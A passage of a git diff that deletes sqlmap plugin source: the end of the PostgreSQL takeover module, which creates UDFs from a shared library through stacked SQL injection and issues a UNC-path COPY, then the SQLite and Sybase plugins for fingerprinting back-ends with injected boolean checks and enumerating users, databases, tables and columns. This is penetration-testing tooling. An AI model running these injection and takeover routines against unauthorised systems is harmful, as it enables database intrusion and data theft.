majorVer = "9.3" - elif banVer >= "9.2": - majorVer = "9.2" - elif banVer >= "9.1": - majorVer = "9.1" - elif banVer >= "9.0": - majorVer = "9.0" - elif banVer >= "8.4": - majorVer = "8.4" - elif banVer >= "8.3": - majorVer = "8.3" - elif banVer >= "8.2": - majorVer = "8.2" - else: - errMsg = "unsupported feature on versions of PostgreSQL before 8.2" - raise SqlmapUnsupportedFeatureException(errMsg) - - try: - if Backend.isOs(OS.WINDOWS): - _ = os.path.join(self.udfLocalFile, "postgresql", "windows", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.dll_") - checkFile(_) - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "dll" - else: - _ = os.path.join(self.udfLocalFile, "postgresql", "linux", "%d" % Backend.getArch(), majorVer, "lib_postgresqludf_sys.so_") - checkFile(_) - self.udfLocalFile = decloakToTemp(_) - self.udfSharedLibExt = "so" - except SqlmapSystemException: - errMsg = "unsupported feature on PostgreSQL %s (%s-bit)" % (majorVer, Backend.getArch()) - raise SqlmapUnsupportedFeatureException(errMsg) - - def udfCreateFromSharedLib(self, udf, inpRet): - if udf in self.udfToCreate: - logger.info("creating UDF '%s' from the binary UDF file" % udf) - - inp = ", ".join(i for i in inpRet["input"]) - ret = inpRet["return"] - - # Reference: http://www.postgresql.org/docs/8.3/interactive/sql-createfunction.html - inject.goStacked("DROP FUNCTION %s(%s)" % (udf, inp)) - inject.goStacked("CREATE OR REPLACE FUNCTION %s(%s) RETURNS %s AS '%s', '%s' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE" % (udf, inp, ret, self.udfRemoteFile, udf)) - - self.createdUdf.add(udf) - else: - logger.debug("keeping existing UDF '%s' as requested" % udf) - - def uncPathRequest(self): - self.createSupportTbl(self.fileTblName, self.tblField, "text") - inject.goStacked("COPY %s(%s) FROM '%s'" % (self.fileTblName, self.tblField, self.uncPath), silent=True) - self.cleanup(onlyFileTbl=True) diff --git a/plugins/dbms/sqlite/__init__.py b/plugins/dbms/sqlite/__init__.py deleted file mode 100644 index bccf2c4b..00000000 --- a/plugins/dbms/sqlite/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import SQLITE_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.sqlite.enumeration import Enumeration -from plugins.dbms.sqlite.filesystem import Filesystem -from plugins.dbms.sqlite.fingerprint import Fingerprint -from plugins.dbms.sqlite.syntax import Syntax -from plugins.dbms.sqlite.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class SQLiteMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines SQLite methods - """ - - def __init__(self): - self.excludeDbsList = SQLITE_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.SQLITE] = Syntax.escape diff --git a/plugins/dbms/sqlite/connector.py b/plugins/dbms/sqlite/connector.py deleted file mode 100644 index a3ced69b..00000000 --- a/plugins/dbms/sqlite/connector.py +++ /dev/null @@ -1,88 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import sqlite3 -except ImportError: - pass - -import logging - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from lib.core.exception import SqlmapMissingDependence -from plugins.generic.connector import Connector as GenericConnector - - -class Connector(GenericConnector): - """ - Homepage: http://pysqlite.googlecode.com/ and http://packages.ubuntu.com/quantal/python-sqlite - User guide: http://docs.python.org/release/2.5/lib/module-sqlite3.html - API: http://docs.python.org/library/sqlite3.html - Debian package: python-sqlite (SQLite 2), python-pysqlite3 (SQLite 3) - License: MIT - - Possible connectors: http://wiki.python.org/moin/SQLite - """ - - def __init__(self): - GenericConnector.__init__(self) - self.__sqlite = sqlite3 - - def connect(self): - self.initConnection() - self.checkFileDb() - - try: - self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) - - cursor = self.connector.cursor() - cursor.execute("SELECT * FROM sqlite_master") - cursor.close() - - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: - warnMsg = "unable to connect using SQLite 3 library, trying with SQLite 2" - logger.warn(warnMsg) - - try: - try: - import sqlite - except ImportError: - errMsg = "sqlmap requires 'python-sqlite' third-party library " - errMsg += "in order to directly connect to the database '%s'" % self.db - raise SqlmapMissingDependence(errMsg) - - self.__sqlite = sqlite - self.connector = self.__sqlite.connect(database=self.db, check_same_thread=False, timeout=conf.timeout) - except (self.__sqlite.DatabaseError, self.__sqlite.OperationalError), msg: - raise SqlmapConnectionException(msg[0]) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) - return None - - def execute(self, query): - try: - self.cursor.execute(utf8encode(query)) - except self.__sqlite.OperationalError, msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg[0]) - except self.__sqlite.DatabaseError, msg: - raise SqlmapConnectionException(msg[0]) - - self.connector.commit() - - def select(self, query): - self.execute(query) - return self.fetchall() diff --git a/plugins/dbms/sqlite/enumeration.py b/plugins/dbms/sqlite/enumeration.py deleted file mode 100644 index 865662bd..00000000 --- a/plugins/dbms/sqlite/enumeration.py +++ /dev/null @@ -1,64 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.data import logger -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getCurrentUser(self): - warnMsg = "on SQLite it is not possible to enumerate the current user" - logger.warn(warnMsg) - - def getCurrentDb(self): - warnMsg = "on SQLite it is not possible to get name of the current database" - logger.warn(warnMsg) - - def isDba(self): - warnMsg = "on SQLite the current user has all privileges" - logger.warn(warnMsg) - - def getUsers(self): - warnMsg = "on SQLite it is not possible to enumerate the users" - logger.warn(warnMsg) - - return [] - - def getPasswordHashes(self): - warnMsg = "on SQLite it is not possible to enumerate the user password hashes" - logger.warn(warnMsg) - - return {} - - def getPrivileges(self, *args): - warnMsg = "on SQLite it is not possible to enumerate the user privileges" - logger.warn(warnMsg) - - return {} - - def getDbs(self): - warnMsg = "on SQLite it is not possible to enumerate databases (use only '--tables')" - logger.warn(warnMsg) - - return [] - - def searchDb(self): - warnMsg = "on SQLite it is not possible to search databases" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - errMsg = "on SQLite it is not possible to search columns" - raise SqlmapUnsupportedFeatureException(errMsg) - - def getHostname(self): - warnMsg = "on SQLite it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/sqlite/filesystem.py b/plugins/dbms/sqlite/filesystem.py deleted file mode 100644 index 7c404816..00000000 --- a/plugins/dbms/sqlite/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on SQLite it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on SQLite it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sqlite/fingerprint.py b/plugins/dbms/sqlite/fingerprint.py deleted file mode 100644 index e03f9733..00000000 --- a/plugins/dbms/sqlite/fingerprint.py +++ /dev/null @@ -1,110 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.session import setDbms -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import SQLITE_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.SQLITE) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.SQLITE - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - """ - References for fingerprint: - - * http://www.sqlite.org/lang_corefunc.html - * http://www.sqlite.org/cvstrac/wiki?p=LoadableExtensions - """ - - if not conf.extensiveFp and (Backend.isDbmsWithin(SQLITE_ALIASES) or (conf.dbms or "").lower() in SQLITE_ALIASES): - setDbms(DBMS.SQLITE) - - self.getBanner() - - return True - - infoMsg = "testing %s" % DBMS.SQLITE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("LAST_INSERT_ROWID()=LAST_INSERT_ROWID()") - - if result: - infoMsg = "confirming %s" % DBMS.SQLITE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("SQLITE_VERSION()=SQLITE_VERSION()") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) - - return False - else: - infoMsg = "actively fingerprinting %s" % DBMS.SQLITE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("RANDOMBLOB(-1)>0") - version = '3' if result else '2' - Backend.setVersion(version) - - setDbms(DBMS.SQLITE) - - self.getBanner() - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.SQLITE - logger.warn(warnMsg) - - return False - - def forceDbmsEnum(self): - conf.db = "%s%s" % (DBMS.SQLITE, METADB_SUFFIX) diff --git a/plugins/dbms/sqlite/syntax.py b/plugins/dbms/sqlite/syntax.py deleted file mode 100644 index 9c6d86aa..00000000 --- a/plugins/dbms/sqlite/syntax.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import binascii - -from lib.core.common import Backend -from lib.core.common import isDBMSVersionAtLeast -from lib.core.settings import UNICODE_ENCODING -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - GenericSyntax.__init__(self) - - @staticmethod - def escape(expression, quote=True): - """ - >>> Backend.setVersion('2') - ['2'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT 'abcdefgh' FROM foobar" - >>> Backend.setVersion('3') - ['3'] - >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") - "SELECT CAST(X'6162636465666768' AS TEXT) FROM foobar" - """ - - def escaper(value): - # Reference: http://stackoverflow.com/questions/3444335/how-do-i-quote-a-utf-8-string-literal-in-sqlite3 - return "CAST(X'%s' AS TEXT)" % binascii.hexlify(value.encode(UNICODE_ENCODING) if isinstance(value, unicode) else value) - - retVal = expression - - if isDBMSVersionAtLeast('3'): - retVal = Syntax._escape(expression, quote, escaper) - - return retVal diff --git a/plugins/dbms/sqlite/takeover.py b/plugins/dbms/sqlite/takeover.py deleted file mode 100644 index 49e3fb09..00000000 --- a/plugins/dbms/sqlite/takeover.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.takeover import Takeover as GenericTakeover - -class Takeover(GenericTakeover): - def __init__(self): - GenericTakeover.__init__(self) - - def osCmd(self): - errMsg = "on SQLite it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osShell(self): - errMsg = "on SQLite it is not possible to execute commands" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osPwn(self): - errMsg = "on SQLite it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) - - def osSmb(self): - errMsg = "on SQLite it is not possible to establish an " - errMsg += "out-of-band connection" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/__init__.py b/plugins/dbms/sybase/__init__.py deleted file mode 100644 index 9b8de285..00000000 --- a/plugins/dbms/sybase/__init__.py +++ /dev/null @@ -1,33 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.settings import SYBASE_SYSTEM_DBS -from lib.core.unescaper import unescaper -from plugins.dbms.sybase.enumeration import Enumeration -from plugins.dbms.sybase.filesystem import Filesystem -from plugins.dbms.sybase.fingerprint import Fingerprint -from plugins.dbms.sybase.syntax import Syntax -from plugins.dbms.sybase.takeover import Takeover -from plugins.generic.misc import Miscellaneous - -class SybaseMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): - """ - This class defines Sybase methods - """ - - def __init__(self): - self.excludeDbsList = SYBASE_SYSTEM_DBS - - Syntax.__init__(self) - Fingerprint.__init__(self) - Enumeration.__init__(self) - Filesystem.__init__(self) - Miscellaneous.__init__(self) - Takeover.__init__(self) - - unescaper[DBMS.SYBASE] = Syntax.escape diff --git a/plugins/dbms/sybase/connector.py b/plugins/dbms/sybase/connector.py deleted file mode 100644 index 89e8847e..00000000 --- a/plugins/dbms/sybase/connector.py +++ /dev/null @@ -1,81 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -try: - import _mssql - import pymssql -except ImportError: - pass - -import logging - -from lib.core.convert import utf8encode -from lib.core.data import conf -from lib.core.data import logger -from lib.core.exception import SqlmapConnectionException -from plugins.generic.connector import Connector as GenericConnector - -class Connector(GenericConnector): - """ - Homepage: http://pymssql.sourceforge.net/ - User guide: http://pymssql.sourceforge.net/examples_pymssql.php - API: http://pymssql.sourceforge.net/ref_pymssql.php - Debian package: python-pymssql - License: LGPL - - Possible connectors: http://wiki.python.org/moin/SQL%20Server - - Important note: pymssql library on your system MUST be version 1.0.2 - to work, get it from http://sourceforge.net/projects/pymssql/files/pymssql/1.0.2/ - """ - - def __init__(self): - GenericConnector.__init__(self) - - def connect(self): - self.initConnection() - - try: - self.connector = pymssql.connect(host="%s:%d" % (self.hostname, self.port), user=self.user, password=self.password, database=self.db, login_timeout=conf.timeout, timeout=conf.timeout) - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - raise SqlmapConnectionException(msg) - - self.initCursor() - self.printConnected() - - def fetchall(self): - try: - return self.cursor.fetchall() - except (pymssql.ProgrammingError, pymssql.OperationalError, _mssql.MssqlDatabaseException), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - return None - - def execute(self, query): - retVal = False - - try: - self.cursor.execute(utf8encode(query)) - retVal = True - except (pymssql.OperationalError, pymssql.ProgrammingError), msg: - logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % str(msg).replace("\n", " ")) - except pymssql.InternalError, msg: - raise SqlmapConnectionException(msg) - - return retVal - - def select(self, query): - retVal = None - - if self.execute(query): - retVal = self.fetchall() - - try: - self.connector.commit() - except pymssql.OperationalError: - pass - - return retVal diff --git a/plugins/dbms/sybase/enumeration.py b/plugins/dbms/sybase/enumeration.py deleted file mode 100644 index 28c6d0dc..00000000 --- a/plugins/dbms/sybase/enumeration.py +++ /dev/null @@ -1,323 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import filterPairValues -from lib.core.common import isTechniqueAvailable -from lib.core.common import randomStr -from lib.core.common import readInput -from lib.core.common import safeSQLIdentificatorNaming -from lib.core.common import unArrayizeValue -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.data import paths -from lib.core.data import queries -from lib.core.dicts import SYBASE_TYPES -from lib.core.enums import PAYLOAD -from lib.core.exception import SqlmapMissingMandatoryOptionException -from lib.core.exception import SqlmapNoneDataException -from lib.core.exception import SqlmapUserQuitException -from lib.core.settings import CURRENT_DB -from lib.utils.pivotdumptable import pivotDumpTable -from lib.techniques.brute.use import columnExists -from plugins.generic.enumeration import Enumeration as GenericEnumeration - -class Enumeration(GenericEnumeration): - def __init__(self): - GenericEnumeration.__init__(self) - - def getUsers(self): - infoMsg = "fetching database users" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].users - - randStr = randomStr() - query = rootQuery.inband.query - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = (False, True) - else: - blinds = (True,) - - for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) - - if retVal: - kb.data.cachedUsers = retVal[0].values()[0] - break - - return kb.data.cachedUsers - - def getPrivileges(self, *args): - warnMsg = "on Sybase it is not possible to fetch " - warnMsg += "database users privileges, sqlmap will check whether " - warnMsg += "or not the database users are database administrators" - logger.warn(warnMsg) - - users = [] - areAdmins = set() - - if conf.user: - users = [conf.user] - elif not len(kb.data.cachedUsers): - users = self.getUsers() - else: - users = kb.data.cachedUsers - - for user in users: - user = unArrayizeValue(user) - - if user is None: - continue - - isDba = self.isDba(user) - - if isDba is True: - areAdmins.add(user) - - kb.data.cachedUsersPrivileges[user] = None - - return (kb.data.cachedUsersPrivileges, areAdmins) - - def getDbs(self): - if len(kb.data.cachedDbs) > 0: - return kb.data.cachedDbs - - infoMsg = "fetching database names" - logger.info(infoMsg) - - rootQuery = queries[Backend.getIdentifiedDbms()].dbs - randStr = randomStr() - query = rootQuery.inband.query - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = [False, True] - else: - blinds = [True] - - for blind in blinds: - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) - - if retVal: - kb.data.cachedDbs = retVal[0].values()[0] - break - - if kb.data.cachedDbs: - kb.data.cachedDbs.sort() - - return kb.data.cachedDbs - - def getTables(self, bruteForce=None): - if len(kb.data.cachedTables) > 0: - return kb.data.cachedTables - - self.forceDbmsEnum() - - if conf.db == CURRENT_DB: - conf.db = self.getCurrentDb() - - if conf.db: - dbs = conf.db.split(",") - else: - dbs = self.getDbs() - - for db in dbs: - dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - - dbs = filter(None, dbs) - - infoMsg = "fetching tables for database" - infoMsg += "%s: %s" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) - logger.info(infoMsg) - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = [False, True] - else: - blinds = [True] - - rootQuery = queries[Backend.getIdentifiedDbms()].tables - - for db in dbs: - for blind in blinds: - randStr = randomStr() - query = rootQuery.inband.query % db - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr], blind=blind) - - if retVal: - for table in retVal[0].values()[0]: - if db not in kb.data.cachedTables: - kb.data.cachedTables[db] = [table] - else: - kb.data.cachedTables[db].append(table) - break - - for db, tables in kb.data.cachedTables.items(): - kb.data.cachedTables[db] = sorted(tables) if tables else tables - - return kb.data.cachedTables - - def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None, dumpMode=False): - self.forceDbmsEnum() - - if conf.db is None or conf.db == CURRENT_DB: - if conf.db is None: - warnMsg = "missing database parameter. sqlmap is going " - warnMsg += "to use the current database to enumerate " - warnMsg += "table(s) columns" - logger.warn(warnMsg) - - conf.db = self.getCurrentDb() - - elif conf.db is not None: - if ',' in conf.db: - errMsg = "only one database name is allowed when enumerating " - errMsg += "the tables' columns" - raise SqlmapMissingMandatoryOptionException(errMsg) - - conf.db = safeSQLIdentificatorNaming(conf.db) - - if conf.col: - colList = conf.col.split(",") - else: - colList = [] - - if conf.excludeCol: - colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - - for col in colList: - colList[colList.index(col)] = safeSQLIdentificatorNaming(col) - - if conf.tbl: - tblList = conf.tbl.split(",") - else: - self.getTables() - - if len(kb.data.cachedTables) > 0: - tblList = kb.data.cachedTables.values() - - if isinstance(tblList[0], (set, tuple, list)): - tblList = tblList[0] - else: - errMsg = "unable to retrieve the tables " - errMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - raise SqlmapNoneDataException(errMsg) - - for tbl in tblList: - tblList[tblList.index(tbl)] = safeSQLIdentificatorNaming(tbl) - - if bruteForce: - resumeAvailable = False - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - resumeAvailable = True - break - - if resumeAvailable and not conf.freshQueries or colList: - columns = {} - - for column in colList: - columns[column] = None - - for tbl in tblList: - for db, table, colName, colType in kb.brute.columns: - if db == conf.db and table == tbl: - columns[colName] = colType - - if conf.db in kb.data.cachedColumns: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)][safeSQLIdentificatorNaming(tbl, True)] = columns - else: - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = {safeSQLIdentificatorNaming(tbl, True): columns} - - return kb.data.cachedColumns - - message = "do you want to use common column existence check? [y/N/q] " - test = readInput(message, default="Y" if "Y" in message else "N") - - if test[0] in ("n", "N"): - return - elif test[0] in ("q", "Q"): - raise SqlmapUserQuitException - else: - return columnExists(paths.COMMON_COLUMNS) - - rootQuery = queries[Backend.getIdentifiedDbms()].columns - - if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - blinds = [False, True] - else: - blinds = [True] - - for tbl in tblList: - if conf.db is not None and len(kb.data.cachedColumns) > 0 \ - and conf.db in kb.data.cachedColumns and tbl in \ - kb.data.cachedColumns[conf.db]: - infoMsg = "fetched tables' columns on " - infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - return {conf.db: kb.data.cachedColumns[conf.db]} - - if dumpMode and colList: - table = {} - table[safeSQLIdentificatorNaming(tbl)] = dict((_, None) for _ in colList) - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - continue - - infoMsg = "fetching columns " - infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming(tbl) - infoMsg += "on database '%s'" % unsafeSQLIdentificatorNaming(conf.db) - logger.info(infoMsg) - - for blind in blinds: - randStr = randomStr() - query = rootQuery.inband.query % (conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl)) - retVal = pivotDumpTable("(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.usertype' % randStr], blind=blind) - - if retVal: - table = {} - columns = {} - - for name, type_ in filterPairValues(zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.usertype" % randStr])): - columns[name] = SYBASE_TYPES.get(int(type_) if isinstance(type_, basestring) and type_.isdigit() else type_, type_) - - table[safeSQLIdentificatorNaming(tbl)] = columns - kb.data.cachedColumns[safeSQLIdentificatorNaming(conf.db)] = table - - break - - return kb.data.cachedColumns - - def searchDb(self): - warnMsg = "on Sybase searching of databases is not implemented" - logger.warn(warnMsg) - - return [] - - def searchTable(self): - warnMsg = "on Sybase searching of tables is not implemented" - logger.warn(warnMsg) - - return [] - - def searchColumn(self): - warnMsg = "on Sybase searching of columns is not implemented" - logger.warn(warnMsg) - - return [] - - def search(self): - warnMsg = "on Sybase search option is not available" - logger.warn(warnMsg) - - def getHostname(self): - warnMsg = "on Sybase it is not possible to enumerate the hostname" - logger.warn(warnMsg) diff --git a/plugins/dbms/sybase/filesystem.py b/plugins/dbms/sybase/filesystem.py deleted file mode 100644 index 924c5f16..00000000 --- a/plugins/dbms/sybase/filesystem.py +++ /dev/null @@ -1,21 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.exception import SqlmapUnsupportedFeatureException -from plugins.generic.filesystem import Filesystem as GenericFilesystem - -class Filesystem(GenericFilesystem): - def __init__(self): - GenericFilesystem.__init__(self) - - def readFile(self, rFile): - errMsg = "on Sybase it is not possible to read files" - raise SqlmapUnsupportedFeatureException(errMsg) - - def writeFile(self, wFile, dFile, fileType=None, forceCheck=False): - errMsg = "on Sybase it is not possible to write files" - raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/sybase/fingerprint.py b/plugins/dbms/sybase/fingerprint.py deleted file mode 100644 index f5e8f23e..00000000 --- a/plugins/dbms/sybase/fingerprint.py +++ /dev/null @@ -1,119 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import Backend -from lib.core.common import Format -from lib.core.common import unArrayizeValue -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.session import setDbms -from lib.core.settings import SYBASE_ALIASES -from lib.request import inject -from plugins.generic.fingerprint import Fingerprint as GenericFingerprint - -class Fingerprint(GenericFingerprint): - def __init__(self): - GenericFingerprint.__init__(self, DBMS.SYBASE) - - def getFingerprint(self): - value = "" - wsOsFp = Format.getOs("web server", kb.headersFp) - - if wsOsFp: - value += "%s\n" % wsOsFp - - if kb.data.banner: - dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) - - if dbmsOsFp: - value += "%s\n" % dbmsOsFp - - value += "back-end DBMS: " - - if not conf.extensiveFp: - value += DBMS.SYBASE - return value - - actVer = Format.getDbms() - blank = " " * 15 - value += "active fingerprint: %s" % actVer - - if kb.bannerFp: - banVer = kb.bannerFp["dbmsVersion"] - banVer = Format.getDbms([banVer]) - value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) - - htmlErrorFp = Format.getErrorParsedDBMSes() - - if htmlErrorFp: - value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) - - return value - - def checkDbms(self): - if not conf.extensiveFp and (Backend.isDbmsWithin(SYBASE_ALIASES) \ - or (conf.dbms or "").lower() in SYBASE_ALIASES) and Backend.getVersion() and \ - Backend.getVersion().isdigit(): - setDbms("%s %s" % (DBMS.SYBASE, Backend.getVersion())) - - self.getBanner() - - Backend.setOs(OS.WINDOWS) - - return True - - infoMsg = "testing %s" % DBMS.SYBASE - logger.info(infoMsg) - - if conf.direct: - result = True - else: - result = inject.checkBooleanExpression("@@transtate=@@transtate") - - if result: - infoMsg = "confirming %s" % DBMS.SYBASE - logger.info(infoMsg) - - result = inject.checkBooleanExpression("suser_id()=suser_id()") - - if not result: - warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) - - return False - - setDbms(DBMS.SYBASE) - - self.getBanner() - - if not conf.extensiveFp: - return True - - infoMsg = "actively fingerprinting %s" % DBMS.SYBASE - logger.info(infoMsg) - - result = unArrayizeValue(inject.getValue("SUBSTRING(@@VERSION,1,1)")) - - if result and result.isdigit(): - Backend.setVersion(str(result)) - else: - for version in xrange(12, 16): - result = inject.checkBooleanExpression("PATINDEX('%%/%d[./]%%',@@VERSION)>0" % version) - - if result: - Backend.setVersion(str(version)) - break - - return True - else: - warnMsg = "the back-end DBMS is not %s" % DBMS.SYBASE - logger.warn(warnMsg) - - return False diff --git a/plugins/dbms/sybase/syntax.py b/plugins/dbms/sybase/syntax.py deleted file mode 100644 index bbccdf91..00000000 --- a/plugins/dbms/sybase/syntax.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from plugins.generic.syntax import Syntax as GenericSyntax - -class Syntax(GenericSyntax): - def __init__(self): - 